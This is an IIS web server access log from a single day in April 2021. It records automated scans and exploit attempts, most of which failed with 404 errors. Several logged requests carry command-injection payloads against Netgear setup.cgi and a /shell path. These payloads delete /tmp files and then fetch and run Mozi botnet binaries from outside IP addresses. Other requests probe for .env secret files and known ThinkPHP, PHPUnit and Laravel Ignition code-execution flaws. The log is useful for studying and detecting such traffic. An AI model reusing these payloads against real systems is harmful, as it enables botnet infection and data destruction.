#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 00:05:46 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 00:05:46 192.168.0.14 GET /portal/redlion - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 404 0 2 468 2021-04-03 00:18:30 192.168.0.14 GET / - 80 - 192.168.0.1 libwww-perl/6.53 - 200 0 0 218 2021-04-03 00:23:47 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 250 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 00:46:04 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 00:46:04 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 4922 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 01:54:57 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 01:54:57 192.168.0.14 GET /setup.cgi next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://163.125.200.5:37425/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 80 - 192.168.0.1 - - 404 0 2 593 2021-04-03 02:07:38 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 421 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 02:53:44 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 02:53:44 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 1422 2021-04-03 03:06:41 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 296 2021-04-03 03:06:41 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 234 2021-04-03 03:14:49 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 328 2021-04-03 03:14:49 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 296 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 03:46:25 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 03:46:25 192.168.0.14 POST /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 375 2021-04-03 03:46:25 192.168.0.14 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 171 2021-04-03 03:46:26 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 200 0 0 171 2021-04-03 03:46:28 192.168.0.14 GET /login - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 171 2021-04-03 03:46:28 192.168.0.14 GET /jenkins/login - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 171 2021-04-03 03:46:29 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 171 2021-04-03 03:46:29 192.168.0.14 GET /wp-login.php - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 171 2021-04-03 03:46:30 192.168.0.14 GET / s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=__HelloThinkPHP 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 200 0 0 187 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 04:13:27 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 04:13:27 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 468 2021-04-03 04:20:15 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 171 2021-04-03 04:21:10 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.130+Safari/537.36 - 200 0 0 203 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 06:13:40 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 06:13:40 192.168.0.14 POST /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 687 2021-04-03 06:13:40 192.168.0.14 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 484 2021-04-03 06:13:42 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 200 0 0 500 2021-04-03 06:13:42 192.168.0.14 GET /login - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 484 2021-04-03 06:13:43 192.168.0.14 GET /jenkins/login - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 531 2021-04-03 06:13:43 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 484 2021-04-03 06:13:45 192.168.0.14 GET /wp-login.php - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 0 2 484 2021-04-03 06:13:45 192.168.0.14 GET / s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=__HelloThinkPHP 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 200 0 0 500 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 07:37:12 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 07:37:12 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 500 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 08:09:24 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 08:09:24 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+5.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.90+Safari/537.36 - 200 0 0 375 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 10:14:28 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 10:14:28 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 609 2021-04-03 10:21:19 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.105+Safari/537.36 http://127.0.0.1/admin/login.asp 404 0 2 296 2021-04-03 10:26:35 192.168.0.14 POST /boaform/admin/formPing - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.105+Safari/537.36 http://127.0.0.1/diag_ping_admin_en.asp 404 0 2 312 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 12:48:02 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 12:48:02 192.168.0.14 HEAD /wp-content/themes/everfx_3.0/assets/fontawesome/css/all.min.css - 80 - 192.168.0.1 python-requests/2.18.4 - 404 0 2 391 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 14:08:49 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 14:08:49 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 484 2021-04-03 14:08:49 192.168.0.14 GET /vendor/.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 390 2021-04-03 14:08:51 192.168.0.14 GET /storage/.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 437 2021-04-03 14:08:51 192.168.0.14 GET /public/.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 390 2021-04-03 14:08:53 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 515 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 15:33:26 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 15:33:26 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 687 2021-04-03 15:41:39 192.168.0.14 POST /GponForm/diag_Form images/ 80 - 192.168.0.1 Hello,+World - 404 0 2 343 2021-04-03 15:51:32 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 171 2021-04-03 15:51:32 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 187 2021-04-03 16:06:11 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 296 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 16:37:22 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 16:37:22 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 640 2021-04-03 16:48:53 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 343 2021-04-03 16:59:04 192.168.0.14 GET /setup.cgi next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.222.169.93:49720/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 80 - 192.168.0.1 - - 404 0 2 109 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 17:23:21 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 17:23:21 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 406 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 18:59:17 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 18:59:17 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 406 2021-04-03 19:13:18 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_11_6)+AppleWebKit/601.7.7+(KHTML,+like+Gecko)+Version/9.1.2+Safari/601.7.7 - 200 0 0 281 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 20:19:02 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 20:19:02 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 200 0 0 453 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 21:10:59 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 21:10:59 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_11_6)+AppleWebKit/601.7.7+(KHTML,+like+Gecko)+Version/9.1.2+Safari/601.7.7 - 200 0 0 437 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 21:45:21 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 21:45:21 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 200 0 0 468 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 23:11:54 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 23:11:54 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 453 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-04-03 23:45:02 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-04-03 23:45:02 192.168.0.14 GET /c/ - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+5.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.90+Safari/537.36 - 404 0 2 375 2021-04-03 23:47:18 192.168.0.14 GET /shell cd+/tmp;rm+-rf+*;wget+http://61.53.152.138:46918/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 80 - 192.168.0.1 Hello,+world - 404 0 2 390